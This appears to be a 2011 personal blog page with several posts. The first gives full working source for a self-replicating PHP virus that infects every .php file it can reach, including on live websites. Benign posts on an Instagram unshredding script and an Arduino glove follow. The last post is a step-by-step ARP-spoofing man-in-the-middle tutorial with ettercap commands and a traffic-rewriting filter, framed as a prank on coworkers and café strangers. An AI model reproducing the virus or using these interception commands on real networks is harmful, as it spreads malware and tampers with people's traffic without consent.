And that’s all there is to it. Some consider computer viruses to be the most primitive form of artificial intelligence, because their primary function is to replicate themselves or “spawn”, just like any other life form. Since virus authors today like to write viruses in higher-level languages, I decided to write my own virus in a higher-level language… nevertheless keeping the traditional methods of replication and bombing. I wrote it in PHP and I did this for fun. It took me no longer than the duration of 2 Twilight Zone (original series) episodes. It’s educational, but please take caution if you run it. It IS a working virus and it WILL recurse directories and infect other PHP files… which in turn will infect other PHP files. The “bomb” portion of the virus doesn’t do anything malicious… it just prints “HAPPY BIRTHDAY CRANKY!” to the screen on my actual birthday. The interesting thing about writing a virus in PHP is that a) it can run on Windows, OS X, and *nix and b) once it infects a website, any PHP file that runs as a direct result of a user visiting the site will cause the virus to run and infect other PHP files and, if triggered on the correct day, say “HAPPY BIRTHDAY CRANKY!” on said website… unless, of course, it runs into file permission restrictions.
<?php
define("SIGNATURE", "CRANKY'S PHP VIRUS");
// determine whether backslashes or forward slashes are used
define("SLASH", stristr($_SERVER['PWD'], "/") ? "/" : "\\");
$linenumber = __LINE__;
define("STARTLINE", $linenumber-4);
define("ENDLINE", $linenumber+45);
function search($path){
    $ret = "";
    $fp = opendir($path);
    while($f = readdir($fp)){
        if( preg_match("#^\.+$#", $f) ) continue; // skip the . and .. entries
        $file_full_path = $path.SLASH.$f;
        if(is_dir($file_full_path)) { // if it's a directory, recurse
            $ret .= search($file_full_path);
        } else if( !stristr(file_get_contents($file_full_path), SIGNATURE) ) { // search for uninfected files to infect
            $ret .= $file_full_path."\n";
        }
    }
    return $ret;
}
function infect($filestoinfect){
    $handle = @fopen(__FILE__, "r");
    $counter = 1;
    $virusstring = "";
    while(($buffer = fgets($handle, 4096)) !== false){
        if($counter >= STARTLINE && $counter <= ENDLINE){
            $virusstring .= $buffer;
        }
        $counter++;
    }
    fclose($handle);
    $filesarray = array();
    $filesarray = explode("\n", $filestoinfect);
    foreach($filesarray AS $v){
        if(substr($v, -4) === ".php"){
            $filecontents = file_get_contents($v);
            file_put_contents($v, $virusstring.$filecontents);
        }
    }
}
function bomb(){
    if(date("md") == "0125"){ // compare as a string: a bare 0125 is an octal literal
        echo "HAPPY BIRTHDAY CRANKY!";
    }
}
$filestoinfect = search(__DIR__);
infect($filestoinfect);
bomb();
?>
You can also download the source code here.
To test it out, I wrote a bunch of short and simple PHP files and placed them in the same folder. Then I made a subfolder and put some PHP files in there. Then I made a sub-subfolder and put some PHP files in there as well. I ran the virus and what do you know? It infected ALL the PHP files. By changing a couple of characters in the regex, I could make this recurse up the directory structure as well… but I didn’t. Enjoy, be safe, and don’t be a malicious script kiddie.
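The same recursive walk the virus uses can run in reverse, too: a harmless scanner that reports which .php files already carry the signature. Here’s a sketch of that idea in Python (the signature string matches the one in the PHP above; the case-insensitive check mirrors stristr()):

```python
import os

SIGNATURE = "CRANKY'S PHP VIRUS"

def find_infected(root):
    """Recurse through a directory tree like the virus does,
    but only report infected .php files instead of infecting them."""
    infected = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as f:
                # case-insensitive signature check, like PHP's stristr()
                if SIGNATURE.lower() in f.read().lower():
                    infected.append(path)
    return infected
```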
NOVEMBER 18, 2011
My Solution to The Instagram Engineering Challenge
Instagram introduced an Engineering Challenge called the “Unshredder”. You can view the challenge on their page here.
To sum it up, they want you to create software that can take an image shredded by a paper shredder, and unshred it.
On their blog, they state that this is the way to get a job at Instagram… They also give you a free Instagram t-shirt even if you don’t want to work there. Pretty cool. (Please don’t submit my code to Instagram and try to get a job)
They want you to take any given image that’s shredded like this:
and fix it so it looks like this:
Sounds fun. This is no challenge if I’m going to do it in PHP and GD. To be honest, I’m getting real bored of PHP and I’ve been wanting to get some Python practice in. I read one and a half Python books, so I figured this would be a perfect opportunity to get more comfortable with the language. Python is actually pretty fun. I like the fact that it’s a procedural language, object-oriented language, and a functional language all in one. My solution is not elegant (as I’m still learning Python), but it works!
from PIL import Image

image = Image.open("TokyoPanoramaShredded.png")
data = list(image.getdata())
width, height = image.size
NUMBER_OF_COLUMNS = 20

def get_pixel_value(x, y):
    pixel = data[y * width + x]
    return pixel

def compare_strips(column1, column2):
    # average per-channel difference between the right edge of column1
    # and the left edge of column2, summed over the full height
    dif = rdif = gdif = bdif = 0
    x1 = ((width/NUMBER_OF_COLUMNS)*column1)-1
    x2 = (width/NUMBER_OF_COLUMNS)*(column2-1)
    for y in range(0, height):
        data1 = get_pixel_value(x1, y)
        data2 = get_pixel_value(x2, y)
        rdif += abs(data1[0]-data2[0])
        gdif += abs(data1[1]-data2[1])
        bdif += abs(data1[2]-data2[2])
    return (rdif+gdif+bdif)/3

def compare_striptops(column1, column2):
    # same comparison, but only for the topmost pixel of each edge
    x1 = ((width/NUMBER_OF_COLUMNS)*column1)-1
    x2 = (width/NUMBER_OF_COLUMNS)*(column2-1)
    data1 = get_pixel_value(x1, 0)
    data2 = get_pixel_value(x2, 0)
    rdif = abs(data1[0]-data2[0])
    gdif = abs(data1[1]-data2[1])
    bdif = abs(data1[2]-data2[2])
    return (rdif+gdif+bdif)/3
# find adjacent strips: for each strip, record the strip that best fits
# against its right edge (lowest average difference)
strips = []
for strip1 in range(1, NUMBER_OF_COLUMNS+1):
    strips.append((strip1, 0, 100000))
    for strip2 in range(1, NUMBER_OF_COLUMNS+1):
        if (strip1 != strip2):
            temp = strip1, strip2, compare_strips(strip1, strip2)
            if (temp[2] < strips[strip1-1][2]):
                strips[strip1-1] = temp
# chain the best matches into an ordered sequence of strips
sortedstrips = [strips[0]]
while len(sortedstrips) < NUMBER_OF_COLUMNS:
    sortedstrips.append(strips[sortedstrips[-1][1]-1])
# the true left edge of the image is wherever adjacent strip tops match WORST
seam = (0, 0)
for i in range(0, NUMBER_OF_COLUMNS):
    temp = i, compare_striptops(sortedstrips[i-1][0], sortedstrips[i][0])
    if (temp[1] > seam[1]):
        seam = temp
# rotate the sequence so the strip after the seam comes first
for i in range(0, seam[0]):
    temp = sortedstrips.pop(0)
    sortedstrips.append(temp)
# Create a new image of the same size as the original
# and copy a region into the new image
unshredded = Image.new("RGBA", image.size)
shred_width = unshredded.size[0]/NUMBER_OF_COLUMNS
for i in range(0, NUMBER_OF_COLUMNS):
    shred_number = sortedstrips[i][0]
    x1, y1 = (shred_width * shred_number)-shred_width, 0
    x2, y2 = x1 + shred_width, height
    source_region = image.crop((x1, y1, x2, y2))
    destination_point = (i * shred_width, 0)
    unshredded.paste(source_region, destination_point)
# Output the new image
unshredded.save("unshredded.jpg", "JPEG")
Feel free to download it, modify it, improve it here.
OCTOBER 30, 2011
My Homemade Nintendo Powerglove
Remember the old Nintendo powerglove? Of course you do. Well, I’m here to bring it back. With just an arduino, a piezo transducer, flex sensors, 10k Ohm resistors, some wires, rubber bands, a glove, and some C programming knowledge, I am able to recreate the old school Nintendo powerglove…. except this time, I made it into an electronic musical instrument. I mean… do you ever have a melody stuck in your head and you can’t help but to play the imaginary piano keys with your fingers? Well, this is what inspired me to do this. LOL. Seriously.
Yeah I know… you’re probably thinking 1) this looks ugly and 2) I should use this for something cooler. You are absolutely correct, and this is just the beginning of my little powerglove project. Just wait until I finally receive my 3-axis accelerometer in the mail (I didn’t want to break apart a wii controller to do this)… I’m gonna do all sorts of things. What’s on my list?
- Use it to control a robotic arm
- Create an AIR keyboard or mouse (kind of like Minority Report… except you have to be wearing the glove).
- Use it to control the movement on video games
- The beginning of an ironman suit! (j/k… sort of)
Well… enjoy the pictures and the video and the source code.
…. and HERE is my source code:
int potpin0 = 0; // flex sensor analog pins, one per finger
int potpin1 = 1;
int potpin2 = 2;
int potpin3 = 3;
int potpin4 = 4;
int speakerPin = 7;
int val0, val1, val2, val3, val4;
int flexlow = 50;
int flexhigh = 300;
int flexminimum = 230; // a reading below this means the finger is bent

void setup()
{
  pinMode(speakerPin, OUTPUT);
}

void loop()
{
  val0 = analogRead(potpin0);
  val1 = analogRead(potpin1);
  val2 = analogRead(potpin2);
  val3 = analogRead(potpin3);
  val4 = analogRead(potpin4);
  if(val0 < flexminimum){
    playTone(1915);
  }
  else if(val1 < flexminimum){
    playTone(1700);
  }
  else if(val2 < flexminimum){
    playTone(1519);
  }
  else if(val3 < flexminimum){
    playTone(1432);
  }
  else if(val4 < flexminimum){
    playTone(1275);
  }
}

// note is the half-period in microseconds; toggle the speaker
// pin through 100 full cycles to produce an audible tone
void playTone(int note)
{
  for (int i=0; i<100; i++)
  {
    digitalWrite(speakerPin, HIGH);
    delayMicroseconds(note);
    digitalWrite(speakerPin, LOW);
    delayMicroseconds(note);
  }
}
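For what it’s worth, those delay values are half-periods in microseconds, so each maps to a pitch via f = 1,000,000 / (2 × delay). A quick Python check shows the glove plays roughly the notes C through G:

```python
# playTone() holds the pin HIGH for `note` microseconds, then LOW for
# the same, so one full cycle is 2*note us and the frequency is 1e6/(2*note)
half_periods = {"C": 1915, "D": 1700, "E": 1519, "F": 1432, "G": 1275}

def to_hz(half_period_us):
    return 1_000_000 / (2 * half_period_us)

for name, us in half_periods.items():
    print(name, round(to_hz(us), 1))
```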
OCTOBER 13, 2011
Prank Hacking Your Co-workers for Fun
I have a funny prank/hack to pull at the office, Denny’s, Starbucks, etc. Anytime you are connected to a wireless access point, you can potentially target any victim on your network, run a man-in-the-middle attack, and manipulate their packets. For example, I used a filter to replace ALL occurrences of img src=” with img src=”http://www.cranklin.com/mickey.png”. What does this do? It replaces all images (loaded with the html img tag) on the victim’s web browser with an image of my liking. For our example here, I will use this awesome picture of Mickey Mouse (with my domain name advertised on it of course).
Here are some snapshots of the screen on another computer in the network.
The website you are seeing is www.nhm.org (Natural History Museum of Los Angeles). Surprise… Mickey Mouse is all over their website. You can get really creative with the filters. You can replace all the links with your own… you can turn off SSL encryption, you can even manipulate Instant Messenger messages and replace all messages with hate messages… etc. LOL.
As a matter of fact, while I was working at IdeaLab, I was testing my filters out on my victim, Shana. At the time, she was doing something on the email newsletter website and I was tampering with her packets. Though it didn’t work properly, she kept getting frustrated because the site wasn’t functioning correctly. The fact is, every time I ran the filter, bizarre things would happen on the site… and every time I turned off the filter, the site would behave normally. I was trying real hard to keep a straight face and not bust up in laughter.
So how did I do it?
When you feel like being mischievous, connect your computer to a wireless access point. (Mac/Linux/Unix) run:
route -n
(Windows) run: ipconfig
and note the IP address of your gateway.
Find the local IP address of your victim. Running something like
nmap -sP 192.168.1.*
will help you do this. Note the IP address of your victim.
Now, we’re going to run what we call a “man-in-the-middle attack”. This is done by ARP spoofing. The way it works is that we pretend to be the gateway. The victim will unknowingly direct all his/her packets to your PC rather than the gateway. Your PC forwards those packets to the gateway so the victim’s network connection never gets severed. To do this, first turn on packet forwarding by running
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
(Note: sudo echo 1 > /proc/sys/net/ipv4/ip_forward won’t do what you want, because the shell applies the redirection before sudo runs. This will also differ depending on your OS.)
Now, to construct your filter. My filter file “mickeymouse.filter” looks like this:
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.cranklin.com/mickey.png\" ");
   replace("IMG SRC=", "img src=\"http://www.cranklin.com/mickey.png\" ");
   msg("Filter Ran.\n");
}
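What the filter does to a captured HTTP payload can be sketched in plain Python. Note the trick in the replacement string: the original URL is left behind as a stray quoted token, which browsers ignore in favor of the injected src (the image URL is the one from the post; the sample HTML is made up):

```python
MICKEY = 'img src="http://www.cranklin.com/mickey.png" '

def run_filter(payload):
    """Mimic the ettercap filter: clobber every img src with our own.
    Both lowercase and uppercase forms are handled, like the two
    replace() rules in the filter."""
    return payload.replace("img src=", MICKEY).replace("IMG SRC=", MICKEY)

html = '<img src="/photos/cat.jpg">'
print(run_filter(html))
```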
You need to compile it using ettercap’s filter compiler by running
etterfilter mickeymouse.filter -o mickeymouse.ef
Now, you’re ready to run the attack with this:
sudo ettercap -i eth1 -T -q -F mickeymouse.ef -M arp:remote /192.168.1.1/ /192.168.1.101/
The first IP is the IP of your gateway. The second IP is the IP of your victim. Your wireless interface may also be different depending on your computer. In my case, it is eth1.
LOL. Very funny prank. Imagine messing with a stranger on his/her computer at Starbucks. I still have trouble making it work with gzip compression on some web servers. You can also do this same thing without targeting one victim at a time. Using a nifty tool called “airpwn”, you can intercept requests in the air and beat the webserver’s responses to the victims’ computers. The REAL packets arrive out of sequence and are therefore ignored.